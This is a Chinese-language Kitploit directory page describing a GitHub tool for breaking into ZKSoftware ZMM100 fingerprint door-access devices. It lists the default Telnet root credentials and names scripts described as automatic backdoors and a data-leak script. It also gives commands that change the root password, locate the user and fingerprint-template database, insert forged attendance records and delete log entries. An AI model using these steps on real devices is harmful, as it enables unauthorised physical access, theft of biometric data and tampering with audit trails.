Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Backdooring-ZMM100-FingerPrint-Devices — 认证绕过 & 自动后门植入设备 | Kitploit
工具/GitHubGitHub/9aylas/backdooring-zmm100-fingerprint-devices
身份验证与授权嵌入式系统安全密码攻击漏洞利用硬件黑客远程访问工具数据库安全
GitHub9aylas/backdooring-zmm100-fingerprint-devices

Backdooring-ZMM100-FingerPrint-Devices

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

认证绕过 & 自动后门植入设备

查看仓库
16437年前尚未审核

入侵嵌入式设备 :

root@kitploit:~
硬件平台 ZMM100 :
由 ZKSoftware 制造的指纹门禁设备。
    • 默认用户名/密码 : root:solokey
  • 协议 : Telnet (23)。

脚本 :

  • pwnit.py : 用于入侵设备的自动化工具。
  • hell : 第二个后门。
  • leak-data.sh : 第三个后门。

YouTube 视频 :

图片 https://www.youtube.com/watch?v=Zd1N0CbvR0k

更改 root 密码 :

root@kitploit:~
passwd
{ enter new root password }
cp /etc/passwd /mnt/mtdblock
cp /etc/passwd /mnt/mtdblock/data/

更多信息 :

root@kitploit:~
This directory "mnt/ramdisk" contains : picture.jpg , finger.bmp.
Web directory  "/mnt/mtdblock/service/webserver" contains : some shitty csl web files lol.
Database here : "/mnt/mtdblock/data/ZKDB.db"
Important tables : "ATT_LOGS" ( user logs ) , "USER_INFO" ( user informations ) , "fptemplate10"  ( finger print data ).
-- https://i.imgur.com/yNfVNSH.png ( ATT_LOGS ).
-- https://i.imgur.com/ujiIqzf.png ( USER_INFO ).
-- https://i.imgur.com/ilGwFZB.png ( fptemplate10 ).

> https://github.com/adrobinoga/zk-protocol/blob/master/sections/data-user.md#example-of-a-template-entry
SQLite ELF 文件 : "/mnt/mtdblock/data/sqlite3_arm" --> ./sqlite3_arm ZKDB.db;

插入/删除数据 :

  • 插入 : ./sqlite3_arm ZKDB.db "INSERT INTO ATT_LOG VALUES (null,1224,15,'2019-04-12T00:00:00','0','0',null,null,null,null,0);"

  • 删除日志 : ./sqlite3_arm ZKDB.db "DELETE FROM ATT_LOG WHERE ID = 1224;"

太他妈棒了 3:) !

参考 :

https://blog.infobytesec.com/2014/07/perverting-embedded-devices-zksoftware_2920.html https://github.com/linsir/pyscripts/tree/master/zkteco_check_in

下载工具